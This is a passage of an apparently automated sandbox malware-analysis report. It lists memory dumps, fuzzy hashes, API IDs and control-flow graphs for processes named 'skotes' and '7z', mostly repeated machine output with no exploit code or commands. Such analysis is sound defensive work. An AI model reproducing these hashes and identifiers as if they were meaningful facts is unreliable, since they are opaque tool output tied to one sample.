                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3213747228-0
                                                                                                                                                                                                                                                  • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                  • Instruction ID: c53fafddc465433499df8f720250a1c6099257d3a9e3fa3b0491c811a430a080
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DB11232D046859FDB11CF28C8817BEBBF5EF55350F14816AD8D5EB242D6399D02EBA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 531285432-0
                                                                                                                                                                                                                                                  • Opcode ID: dc4fa01a7bd77237d454399baa41bf09f719295e39e4dd52fd49e4ba11d7ee21
                                                                                                                                                                                                                                                  • Instruction ID: a21de586506f67550394c0ba6fefc9a77e5b47f3cb337d253ae384483fc69e50
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc4fa01a7bd77237d454399baa41bf09f719295e39e4dd52fd49e4ba11d7ee21
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5214F71E01119AFDF40EFA4DC819BEBBB9EF08720F114415FA05A7261DB389D05ABA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: BufferConsoleExceptionHandleInfoScreenThrowfputs
                                                                                                                                                                                                                                                  • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$ $ || $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELH$Libs:$Unsupported archive type$offset=
                                                                                                                                                                                                                                                  • API String ID: 3442115484-272389550
                                                                                                                                                                                                                                                  • Opcode ID: efdbf60b1f87ae4701dada5a53c43e2d17decba6aa429ea7fbff77fc76d559b0
                                                                                                                                                                                                                                                  • Instruction ID: 184c13c93aab09caa1b4cf410c1af576fd779ab43b28ceff23e90b06786434a4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efdbf60b1f87ae4701dada5a53c43e2d17decba6aa429ea7fbff77fc76d559b0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18726D72214A8186DB34EF25EA903EE73A5F7C9BD0F408116DA8A47769DF3CC549CB40
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3352498445-0
                                                                                                                                                                                                                                                  • Opcode ID: 54998ac9b43deb3202669fcf7b5c24000f3dc5e44eba4657052351fa2ee4f982
                                                                                                                                                                                                                                                  • Instruction ID: cfa807641fa0de639db863fcb3fb8fc2285686043e81b04b208085845dcb73ec
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54998ac9b43deb3202669fcf7b5c24000f3dc5e44eba4657052351fa2ee4f982
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA826B33218A8096CE30EF6AE4903AEB364F7C5B90F548126EB9D57B59DF78C945CB10

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1635 9947ac-99485c call 973314 * 2 1640 99489a-99491b call 996344 call 9732bc call 973b5c free * 2 call 973208 call 973314 1635->1640 1641 99485e-994884 call 972880 1635->1641 1656 9949bd-9949cb call 97477c 1640->1656 1657 994921-994925 1640->1657 1641->1640 1646 994886-994895 call 973404 1641->1646 1646->1640 1662 994dff 1656->1662 1663 9949d1-9949e7 1656->1663 1657->1656 1659 99492b-99495e call 973208 call 97449c 1657->1659 1676 9949b0-9949b8 free 1659->1676 1677 994960-99496f 1659->1677 1665 994e02-994e05 1662->1665 1673 9949e9-994a28 free * 4 1663->1673 1674 994a68-994ad2 call 973208 * 3 1663->1674 1668 994e40-994e45 1665->1668 1669 994e07-994e1c call 972130 1665->1669 1671 994e5d-994e62 call 9770c8 1668->1671 1672 994e47-994e58 call 973518 1668->1672 1691 994e1e-994e2e call 973314 1669->1691 1692 994e30 1669->1692 1689 994e67-994e6a 1671->1689 1698 994f2c-994f98 call 983f0c 1672->1698 1681 994a58-994a63 free 1673->1681 1682 994a2a 1673->1682 1719 994ad8-994adb 1674->1719 1720 994d30-994d3b 1674->1720 1676->1656 1684 99497a-99498b 1677->1684 1685 994971-994978 1677->1685 1686 99504a-995059 free 1681->1686 1690 994a2e-994a41 1682->1690 1693 994993-994996 1684->1693 1685->1684 1685->1693 1696 99523b-99524e 1686->1696 1689->1698 1699 994e70-994eea GetLastError call 973518 call 97362c free * 4 1689->1699 1700 994a43-994a4f free * 2 1690->1700 1701 994a54-994a56 1690->1701 1695 994e33-994e3b call 97b8f0 1691->1695 1692->1695 1693->1676 1694 994998-9949ad call 973404 1693->1694 1694->1676 1695->1668 1714 99505e-995062 1698->1714 1715 994f9e-994fa2 1698->1715 1729 994f1a-994f27 free 1699->1729 1730 994eec 1699->1730 1700->1701 1701->1681 1701->1690 1717 99506e 1714->1717 1718 995064-99506c 1714->1718 1715->1714 1721 994fa8-994fac 1715->1721 1723 995071-99507d 1717->1723 1718->1717 1718->1723 1724 994add-994ae0 1719->1724 1725 994b24-994b3e call 99ec5c 1719->1725 1726 994d41-994dae call 982a84 free * 4 1720->1726 1727 994df0-994dfd call 982a84 1720->1727 1721->1714 1728 994fb2-994fc7 call 9832e8 1721->1728 1734 995083-9950d1 1723->1734 1735 995152-99516d 1723->1735 1724->1725 1736 994ae2-994aee 1724->1736 1746 994c9d-994cee call 982a84 free * 4 1725->1746 1747 994b44 1725->1747 1792 994dde-994deb free 1726->1792 1793 994db0 1726->1793 1727->1665 1728->1714 1753 994fcd-99500d free * 4 1728->1753 1729->1686 1732 994ef0-994f03 1730->1732 1739 994f15-994f18 1732->1739 1740 994f05-994f10 free * 2 1732->1740 1779 995143-995150 call 97ae2c 1734->1779 1780 9950d3-9950de 1734->1780 1751 995173 1735->1751 1742 994b4c-994b50 1736->1742 1743 994af0-994af7 1736->1743 1739->1729 1739->1732 1740->1739 1748 994b60-994b63 1742->1748 1749 994b52-994b5a 1742->1749 1743->1742 1752 994af9-994b14 call 99b290 1743->1752 1775 994d1e-994d2b free 1746->1775 1776 994cf0 1746->1776 1747->1742 1756 994bc1-994bc4 1748->1756 1757 994b65-994b80 call 974318 1748->1757 1749->1748 1755 994bf5-994bff 1749->1755 1758 995175-99517b 1751->1758 1782 994c0a-994c5b call 982a84 free * 4 1752->1782 1783 994b1a-994b22 1752->1783 1761 99503d-995048 free 1753->1761 1762 99500f 1753->1762 1755->1719 1766 994c05 1755->1766 1763 994be3-994bf2 call 9bc7d4 1756->1763 1764 994bc6-994be1 call 9843fc 1756->1764 1789 994b82-994b85 1757->1789 1790 994b87-994b9e 1757->1790 1769 99517d-995188 call 986cd0 1758->1769 1770 995190-99519e call 9b1850 1758->1770 1761->1686 1773 995013-995026 1762->1773 1763->1755 1764->1755 1764->1763 1766->1720 1769->1770 1787 9951a1-9951a6 1770->1787 1785 995038-99503b 1773->1785 1786 995028-995033 free * 2 1773->1786 1775->1686 1788 994cf4-994d07 1776->1788 1779->1758 1780->1779 1791 9950e0-9950e3 1780->1791 1819 994c8b-994c98 free 1782->1819 1820 994c5d 1782->1820 1783->1742 1785->1761 1785->1773 1786->1785 1800 9951a8-9951b0 call 986cd0 1787->1800 1801 9951b1-9951f1 free * 4 1787->1801 1802 994d19-994d1c 1788->1802 1803 994d09-994d14 free * 2 1788->1803 1789->1756 1806 994baf-994bb3 1790->1806 1807 994ba0-994ba8 1790->1807 1808 995138-995140 1791->1808 1809 9950e5-9950e7 1791->1809 1792->1686 1799 994db4-994dc7 1793->1799 1817 994dd9-994ddc 1799->1817 1818 994dc9-994dd4 free * 2 1799->1818 1800->1801 1811 995221-995239 free * 2 1801->1811 1812 9951f3 1801->1812 1802->1775 1802->1788 1803->1802 1806->1756 1814 994bb5-994bbd 1806->1814 1807->1756 1813 994baa-994bad 1807->1813 1808->1779 1815 9950e9-9950eb 1809->1815 1816 99512b-995136 1809->1816 1811->1696 1824 9951f7-99520a 1812->1824 1813->1756 1814->1756 1821 9950ed-9950f0 1815->1821 1822 99511f-995129 1815->1822 1816->1779 1817->1792 1817->1799 1818->1817 1819->1686 1825 994c61-994c74 1820->1825 1828 995112-99511d 1821->1828 1829 9950f2-995111 _CxxThrowException 1821->1829 1822->1779 1826 99521c-99521f 1824->1826 1827 99520c-995217 free * 2 1824->1827 1830 994c86-994c89 1825->1830 1831 994c76-994c81 free * 2 1825->1831 1826->1811 1826->1824 1827->1826 1828->1779 1829->1828 1830->1819 1830->1825 1831->1830
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • Can not create output directory: , xrefs: 00994E83
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove$ErrorExceptionLastThrow
                                                                                                                                                                                                                                                  • String ID: Can not create output directory:
                                                                                                                                                                                                                                                  • API String ID: 4159955631-3123869724
                                                                                                                                                                                                                                                  • Opcode ID: e036129a2e5d4b967442d4175a3c84e7df6876bc85e9b62eccccb7c00278bf18
                                                                                                                                                                                                                                                  • Instruction ID: 010d49d846d247dd2ee3c019258b96e01700358a1b8d3fe99770a2d398281edf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e036129a2e5d4b967442d4175a3c84e7df6876bc85e9b62eccccb7c00278bf18
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9426123219AC096CE31EF2AE4907AEB365F7C6B80F549112DB9D47B59DF38C956CB00

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2037 995458-9954e2 2038 9954f2-9954f6 2037->2038 2039 9954e4-9954f0 2037->2039 2040 9954fe-995504 2038->2040 2039->2040 2041 99550a 2040->2041 2042 9955ec-9955fd 2040->2042 2043 99550d-995538 call 977d28 call 973208 2041->2043 2044 9955ff-99560a call 972130 2042->2044 2045 995612-995615 2042->2045 2058 99553a-99554c call 977ebc 2043->2058 2059 99556c-99559c call 97b8f0 free 2043->2059 2044->2045 2048 995624-995639 call 972130 2045->2048 2049 995617-99561f memset 2045->2049 2056 995648 2048->2056 2057 99563b-99563e call 983524 2048->2057 2049->2048 2061 99564b-995656 2056->2061 2064 995643-995646 2057->2064 2068 995551-995554 2058->2068 2059->2043 2074 9955a2 2059->2074 2065 995658-995661 2061->2065 2066 995662-9956d1 call 9943b0 2061->2066 2064->2061 2065->2066 2076 9956fd-995715 2066->2076 2077 9956d3-9956e3 2066->2077 2072 9955a4-9955c7 _CxxThrowException 2068->2072 2073 995556-995562 2068->2073 2075 9955c8-9955eb _CxxThrowException 2072->2075 2073->2075 2078 995564 2073->2078 2074->2042 2075->2042 2079 99571b-99571e 2076->2079 2080 995f1d-995f22 2076->2080 2077->2076 2086 9956e5-9956f8 free 2077->2086 2078->2059 2084 995726-99572a 2079->2084 2081 995f29-995f3d 2080->2081 2082 995f24-995f27 2080->2082 2094 995f3f-995f52 free 2081->2094 2095 995f54-995f67 2081->2095 2082->2081 2085 995f8d-996002 free * 2 2082->2085 2087 995730-99575f call 977d28 call 973208 2084->2087 2088 995c37-995c50 2084->2088 2098 996004-996017 2085->2098 2099 995f7c-995f8b free 2086->2099 2103 995761-995770 2087->2103 2104 995772-99577e call 977ebc 2087->2104 2088->2084 2089 995c56-995c5a 2088->2089 2089->2080 2094->2099 2095->2085 2105 995f69-995f7b free 2095->2105 2099->2098 2106 99579e-9957b4 call 9b1544 2103->2106 2108 995783-995786 2104->2108 2105->2099 2113 9957ba-99586c call 994504 call 9942a8 call 9940c4 call 973404 call 9a4c00 2106->2113 2114 995c5f-995c80 free * 2 2106->2114 2110 995ef9-995f1c _CxxThrowException 2108->2110 2111 99578c-995798 2108->2111 2110->2080 2111->2106 2111->2110 2126 99587d-995883 2113->2126 2127 99586e-995876 2113->2127 2114->2099 2128 995889-9958b3 call 9b1bc0 2126->2128 2130 995c85-995c9e free 2126->2130 2127->2128 2129 995878 2127->2129 2136 9958b9-9958bc 2128->2136 2137 995d02-995d1e free 2128->2137 2129->2126 2131 995cbe-995cfd free call 994610 free * 2 2130->2131 2132 995ca0 2130->2132 2131->2099 2134 995ca4-995cbc free 2132->2134 2134->2131 2134->2134 2141 9959b1-9959bd 2136->2141 2142 9958c2-9958d3 2136->2142 2139 995d3e-995d7b free call 994610 free * 2 2137->2139 2140 995d20 2137->2140 2139->2099 2146 995d24-995d3c free 2140->2146 2143 995a8e-995a93 2141->2143 2144 9959c3-9959cd 2141->2144 2148 995933 2142->2148 2149 9958d5-995907 call 977d28 call 973208 call 977ebc 2142->2149 2150 995aa1-995ab9 2143->2150 2151 9959d3-9959e1 2144->2151 2152 995a95-995a9a 2144->2152 2146->2139 2146->2146 2154 995936-99594f free 2148->2154 2189 995909-995915 2149->2189 2190 995924-995931 free 2149->2190 2159 995abb-995ac3 2150->2159 2160 995acc 2150->2160 2157 9959e3-9959ed 2151->2157 2158 995a55-995a58 2151->2158 2152->2150 2161 99596f-9959ac free call 994610 free 2154->2161 2162 995951 2154->2162 2164 9959f5-995a11 call 994434 2157->2164 2168 995a5a-995a86 2158->2168 2169 995a9c 2158->2169 2159->2160 2165 995ac5-995aca 2159->2165 2166 995acf-995b54 call 9947ac 2160->2166 2161->2088 2170 995955-99596d free 2162->2170 2181 995a21-995a30 2164->2181 2182 995a13-995a15 2164->2182 2165->2166 2183 995b5a-995b61 2166->2183 2184 995dfe-995e1a free 2166->2184 2185 995a8c 2168->2185 2186 995d80-995d9c free 2168->2186 2169->2150 2170->2161 2170->2170 2181->2164 2192 995a32-995a52 2181->2192 2182->2181 2191 995a17-995a1d 2182->2191 2193 995b80 2183->2193 2194 995b63-995b7e 2183->2194 2187 995e3a-995e77 free call 994610 free * 2 2184->2187 2188 995e1c 2184->2188 2185->2150 2195 995dbc-995df9 free call 994610 free * 2 2186->2195 2196 995d9e 2186->2196 2187->2099 2197 995e20-995e38 free 2188->2197 2189->2190 2199 995917-99591f 2189->2199 2190->2154 2191->2181 2192->2158 2200 995b88-995bb6 2193->2200 2194->2200 2195->2099 2201 995da2-995dba free 2196->2201 2197->2187 2197->2197 2199->2190 2204 995e7c-995e95 free 2200->2204 2205 995bbc-995bd6 free 2200->2205 2201->2195 2201->2201 2207 995eb5-995ef4 free call 994610 free * 2 2204->2207 2208 995e97 2204->2208 2209 995bd8-995bdc 2205->2209 2210 995bff-995c12 free call 994610 2205->2210 2207->2099 2214 995e9b-995eb3 free 2208->2214 2216 995bde-995bf5 free 2209->2216 2218 995c17-995c35 free 2210->2218 2214->2207 2214->2214 2216->2216 2217 995bf7 2216->2217 2217->2210 2218->2088
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ExceptionThrow$memset
                                                                                                                                                                                                                                                  • String ID: can't decompress folder$there is no such archive
                                                                                                                                                                                                                                                  • API String ID: 4182836161-2069749860
                                                                                                                                                                                                                                                  • Opcode ID: 0531c0556df1e1cc1da6671d873316a8f13ad98ec2fb73028dbba5c41659c69e
                                                                                                                                                                                                                                                  • Instruction ID: 9b0447387a5d192900c0865b3fdc663514d64adc9b87e326d9cd0e7f7eb7aec4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0531c0556df1e1cc1da6671d873316a8f13ad98ec2fb73028dbba5c41659c69e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1524B33219AC086CA21EB2AE4847AFB764F7C6B94F455112DF9E53B29DF38C855CB40
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
